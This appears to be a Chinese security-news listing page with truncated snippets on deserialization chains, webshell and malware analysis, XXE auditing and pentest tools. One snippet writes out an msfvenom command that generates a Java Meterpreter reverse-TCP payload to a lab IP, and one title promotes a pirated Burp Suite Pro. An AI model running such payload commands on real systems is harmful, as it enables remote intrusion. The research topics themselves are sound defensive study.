前言 昨天建了一个公开漏洞POC库,想用neclei ,但是写漏洞检测的yaml实在太麻烦了。至今没有找到能够方便编写yaml的工具。平时时间就那么一点点,一个个漏洞去写岂不是累死了。 于是就想起了用...
.NET 反序列化最新攻击链 XamlImageInfo
0x01 基本介绍 XamlImageInfo类属于命名空间 System.Activities.Presentation.Internal,通常用于WPF处理与图像和图标相关的功能。本次更新的gad...
记一次对某变异webshell的分析
0x01 前言在某活动中捕获到一个变异的webshell(jsp文件格式),如图1.1所示。样本webshell的大致功能是通过加载字节码来执行恶意代码,整个webshell的核心部分逻辑是在字节码中...
分析哥斯拉内存加载Jar技术
背景哥斯拉在第一版的时候就提供了一个黑魔法:内存加载Jar功能。从当时的介绍来看,这个功能本来是为上传数据库驱动用的,后面配合JNA可以实现无文件加载ShellCode,一切都在内存中执行,大大扩展了...
Meterpreter源码分析
一、生成木马上线msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.245.129 LPORT=4444 > /home/rkabyss...
冰蝎漏洞分析另附娱乐向XSS poc
免责声明: 本公众号致力于安全研究和红队攻防技术分享等内容,本文中所有涉及的内容均不针对任何厂商或个人,同时由于传播、利用本公众号所发布的技术或工具造成的任何直接或者间接的后果及损失,均由使用者本人承...
渗透测试神器BurpSuitePRO可以免费白嫖正版了?一分钟搞定!快给自己安排一个!
Burpsuite是一个用于测试Web应用程序安全性的图形化工具。该工具使用java编写,由PortSwigger Web Security开发,几乎是网络安全从业人员人手必备的软件。 Pro版官网:...
护网蓝队的常用工具和溯源平台,护网前的最后一晚,冲冲冲!!!
护网前的最后一晚,给大家整理了,蓝队常用的分析工具和平台(放文末),希望大家都能挺住,机房平平安安。 接下来,先来一波云上做法,保佑大家机房平安!!! 佛教 道教 天主教 三教齐聚,平安顺利,如果还不...
.NET代码审计XXE漏洞系列-详解XmlReader
0x01 XmlReader介绍 XmlReader是.NET中最常用的XML读取类,通过Read()实例方法不断读取Xml文档中的声明,节点开始,节点内容,节点结束,以及空白等等,直到文档结束Rea...
深入分析BundleBot新型恶意软件
Check Point Research (CPR)对被称为BundleBot的新型恶意软件进行了深入分析发现,BundleBot滥用dotnet bundle(单文件),这是一种自包含的格式,可以很...
关于狠魔幻的事-看到最后
一、前言 周五出差回来晚上吃完饭后看了一个系统,打开以后发现今天又是一个不正常的周五。什么情况呢? 通过浏览器(edge、Fir...
原创Paper | 从入门 .NET 到分析金蝶反序列化漏洞学习笔记
作者:Sunflower@知道创宇404实验室 日期:2023年7月10日 1.前言 参考资料由于金蝶云星空能够使用 format 参数指定数据格式为二进制,攻击者可以通过发送由 BinaryForm...